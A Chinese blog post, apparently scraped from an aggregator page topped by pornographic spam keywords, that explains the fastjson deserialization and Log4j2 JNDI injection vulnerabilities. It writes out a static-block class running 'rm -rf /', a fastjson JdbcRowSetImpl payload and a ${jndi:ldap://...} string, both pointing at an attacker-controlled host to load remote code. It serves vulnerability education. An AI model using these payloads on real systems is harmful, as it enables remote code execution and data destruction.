国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

fastJson反序列化漏洞和log4j漏洞

這篇具有很好參考價值的文章主要介紹了fastJson反序列化漏洞和log4j漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

有 attach.class (編譯好的文件)

static{
	Runtime.getRuntime().exec("rm -rf /");
}
        

1.rmi注入

攻擊者建立rmi服務(wù)端,于rmi服務(wù)端建造一系列攻擊對象 ,假設(shè)遠(yuǎn)程地址為 http://abc,可url鏈接到惡意class-attach.class

若被攻擊者訪問到此服務(wù) rmi://abc/attach.class ,靜態(tài)代碼塊會優(yōu)先加載,無需構(gòu)造對象。

fastJson通過序列化漏洞 fastJson<=1.2.47 (高版本添加了序列化白名單和黑名單)

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://abc/attach.class",
        "autoCommit":true
    }
}

在調(diào)用JSON.parse()時,若序列化字符串里為上述字符串,則會自動將JdbcRowSetImpl 的 dataSourceName鏈接改為 rmi遠(yuǎn)程地址并訪問。

2.LDAP注入

JDK < 8u191
高版本需要設(shè)置參數(shù)才可開啟漏洞

        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

Log4j2.x<=2.14.1

JNDI(Java Naming and Directory Interface)是Java平臺中的一種API,用于訪問命名和目錄服務(wù)

攻擊者搭建 一個 ldap服務(wù)器(如marshalsec)假設(shè)遠(yuǎn)程地址為 http://abc,可url鏈接到惡意class-attach.class

str="${jndi:ldap://abc/attach.class}";
logger.error(str);//logger.info(str);

會根據(jù)表達(dá)式去尋找對應(yīng)的目錄

若被攻擊者訪問到此服務(wù) jndi:ldap://abc/attach.class ,靜態(tài)代碼塊會優(yōu)先加載,無需構(gòu)造對象。

若在attach.class使用dnslog即可完全控制web應(yīng)用文章來源地址http://www.zghlxwxcb.cn/news/detail-586617.html

http://www.dnslog.cn/

到了這里,關(guān)于fastJson反序列化漏洞和log4j漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Apache Log4j Server (CVE-2017-5645) 反序列化命令執(zhí)行漏洞

    Apache Log4j Server (CVE-2017-5645) 反序列化命令執(zhí)行漏洞

    Apache Log4j是一個用于Java的日志記錄庫,其支持啟動遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼。 說明 內(nèi)容 漏洞編號 CVE-2017-5645 漏洞名稱 Apache Log4j Server 反序列化命令執(zhí)行漏洞 漏洞評級 高危 影響范圍 Apache Log4j 2.8.2之前

    2024年02月07日
    瀏覽(38)
  • Apache Log4j Server 反序列化命令執(zhí)行漏洞(CVE-2017-5645)(漏洞復(fù)現(xiàn)詳細(xì)過程)

    Apache Log4j Server 反序列化命令執(zhí)行漏洞(CVE-2017-5645)(漏洞復(fù)現(xiàn)詳細(xì)過程)

    目錄 一、漏洞介紹 二、漏洞環(huán)境搭建 三、漏洞利用 四、漏洞流量特征: CVE-2017-5645 是 Apache Log4j 服務(wù)器的一個反序列化命令執(zhí)行漏洞,攻擊者可以利用這個漏洞通過發(fā)送精心制作的請求,遠(yuǎn)程執(zhí)行命令,從而危及服務(wù)器的安全。 進(jìn)入漏洞目錄文件,啟動漏洞環(huán)境:docker-c

    2024年02月16日
    瀏覽(37)
  • Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一個用于Java的日志記錄庫,其支持啟動遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼 環(huán)境:vulhub 工具下載地址: ysoserial 利用工具生成payload: 1.創(chuàng)建文件 進(jìn)入容器內(nèi)部,查看文件創(chuàng)建成功 2.查看反彈的shell 有點

    2024年02月11日
    瀏覽(36)
  • shiro反序列化和log4j

    shiro反序列化和log4j

    進(jìn)入vulhb目錄下的weblogic,復(fù)現(xiàn)CVE-2018-2894漏洞: 查看docker-compose的配置文件: 如圖,里面有一個鏡像文件的信息和服務(wù)名,以及它的 端口號 (后面要用): 然后使用下面命令,搭建docker-compose并啟動: 如圖,安裝成功: 原理如下

    2024年02月07日
    瀏覽(25)
  • Log4j2 反序列化漏洞與復(fù)現(xiàn)

    Log4j → Log for Java ,Apache的開源日志記錄組件 JDK →1.8u21以下的版本 CVE-2021-44228 遠(yuǎn)程代碼執(zhí)行 →2.15.0修復(fù) CVE-2021-45046 拒絕服務(wù)Dos →2.16.0修復(fù) CVE-2021-45105 拒絕服務(wù)Dos →2.17.0修復(fù) CVE-2021-44832 遠(yuǎn)程代碼執(zhí)行 →2.17.1修復(fù) Log4j為了輸出日志時能輸出任意位置的Java對象,引入了Looku

    2024年02月05日
    瀏覽(29)
  • Solr Shiro Log4j2 命令執(zhí)行--文件讀取--反序列化--身份權(quán)限繞過--命令執(zhí)行

    Solr Shiro Log4j2 命令執(zhí)行--文件讀取--反序列化--身份權(quán)限繞過--命令執(zhí)行

    Apache Velocity是一個基于Java的模板引擎,它提供了一個模板語言去引用由Java代碼定義的對象。Velocity是Apache基金會旗下的一個開源軟件項目,旨在確保Web應(yīng)用程序在表示層和業(yè)務(wù)邏輯層之間的隔離(即MVC設(shè)計模式)。 Apache Solr 5.0.0版本至8.3.1版本中存在輸入驗證錯誤漏洞。攻擊

    2024年02月08日
    瀏覽(28)
  • 017-信息打點-語言框架&開發(fā)組件&FastJson&Shiro&Log4j&SpringBoot等

    017-信息打點-語言框架&開發(fā)組件&FastJson&Shiro&Log4j&SpringBoot等

    1、CMS指紋識別-不出網(wǎng)程序識別 2、開發(fā)框架識別-PHPPythonJava 3、開發(fā)組件識別-Java常見安全漏洞組件 解決: 1、CMS識別到后期漏洞利用和代碼審計 2、開發(fā)框架識別到后期漏洞利用和代碼審計 3、開發(fā)組件識別到后期漏洞利用和代碼審計 演示案例: ?指紋識別-本地工具-GotoSc

    2024年01月21日
    瀏覽(19)
  • log4j漏洞詳解

    log4j漏洞詳解

    log4j全名就是(log for java),就是apache的一個開源的日志記錄組件 ,它在Java項目中使用的比較廣泛。 使用方法: ??????????????? 1.pom引入依賴 ??????????????? 2.獲取logger實例 ??????????????? 3.logger.info() debug() error() warn()... 優(yōu)點:功能豐富,易于集成

    2024年02月16日
    瀏覽(23)
  • log4j JNDI注入漏洞

    目錄 log4j JNDI注入漏洞 一、LDAP介紹 二、JDBC介紹 三、JNDI介紹 四、JNDI命名引用 五、log4j JNDI注入漏洞 ?LDAP是一種協(xié)議,LDAP 的全稱是 Lightweight Directory Access Protocol,輕量目錄訪問協(xié)議。 ?JDBC是一種規(guī)范,JDBC的全稱是Java數(shù)據(jù)庫連接(Java Database connect),它是一套用于執(zhí)行SQL語句

    2024年02月01日
    瀏覽(28)
  • Log4j遠(yuǎn)程代碼執(zhí)行漏洞

    Log4j遠(yuǎn)程代碼執(zhí)行漏洞

    簡介 漏洞描述 Apache Log4j 是 Apache 的一個開源項目,Apache log4j-2 是 Log4j 的升級,我們可以控制日志信息輸送的目的地為控制臺、文件、GUI組件等,通過定義每一條日志信息的級別,能夠更加細(xì)致地控制日志的生成過程。 Log4j-2中存在JNDI注入漏洞,當(dāng)程序?qū)⒂脩糨斎氲臄?shù)據(jù)日志

    2024年02月11日
    瀏覽(25)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包